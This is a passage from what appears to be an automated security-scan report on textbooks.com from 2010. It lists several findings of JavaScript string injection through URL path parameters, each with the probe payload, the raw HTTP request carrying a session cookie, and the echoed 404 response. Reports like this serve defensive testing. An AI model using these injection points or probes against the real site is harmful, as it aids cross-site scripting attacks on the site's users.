Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3633
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:51:58 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
pSearchReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/jsff933';e319b3b570d/tbcart-ajax.js'

</script>
...[SNIP]...

1.70. http://www.textbooks.com/js/tbcart-ajax.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /js/tbcart-ajax.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54789'%3babbad13b111 was submitted in the REST URL parameter 2. This input was echoed as 54789';abbad13b111 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/tbcart-ajax.js54789'%3babbad13b111 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3633
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:51:59 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
{
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js/tbcart-ajax.js54789';abbad13b111'

</script>
...[SNIP]...

1.71. http://www.textbooks.com/modcss.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /modcss.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 352f6'%3bb7156053910 was submitted in the REST URL parameter 1. This input was echoed as 352f6';b7156053910 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modcss.php352f6'%3bb7156053910 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:51:58 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/modcss.php352f6';b7156053910'

</script>
...[SNIP]...

1.72. http://www.textbooks.com/rent-textbooks.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /rent-textbooks.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76455'%3b42f8bd74e39 was submitted in the REST URL parameter 1. This input was echoed as 76455';42f8bd74e39 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rent-textbooks.php76455'%3b42f8bd74e39 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3634
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:52:10 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...

   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/rent-textbooks.php76455';42f8bd74e39'

</script>
...[SNIP]...

1.73. http://www.textbooks.com/sell-textbooks.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /sell-textbooks.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e49f'%3bd13ee3e3ada was submitted in the REST URL parameter 1. This input was echoed as 1e49f';d13ee3e3ada in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sell-textbooks.php1e49f'%3bd13ee3e3ada HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3634
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:52:11 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...

   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/sell-textbooks.php1e49f';d13ee3e3ada'

</script>
...[SNIP]...

1.74. http://www.textbooks.com/used-textbooks.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /used-textbooks.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3cf2c'%3b2d1207acd60 was submitted in the REST URL parameter 1. This input was echoed as 3cf2c';2d1207acd60 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /used-textbooks.php3cf2c'%3b2d1207acd60 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3634
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:37 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...

   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/used-textbooks.php3cf2c';2d1207acd60'

</script>
...[SNIP]...

1.75. https://www.textbooks.com/account.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /account.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c03ba'%3b65fb45ab654 was submitted in the REST URL parameter 1. This input was echoed as c03ba';65fb45ab654 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /account.phpc03ba'%3b65fb45ab654 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
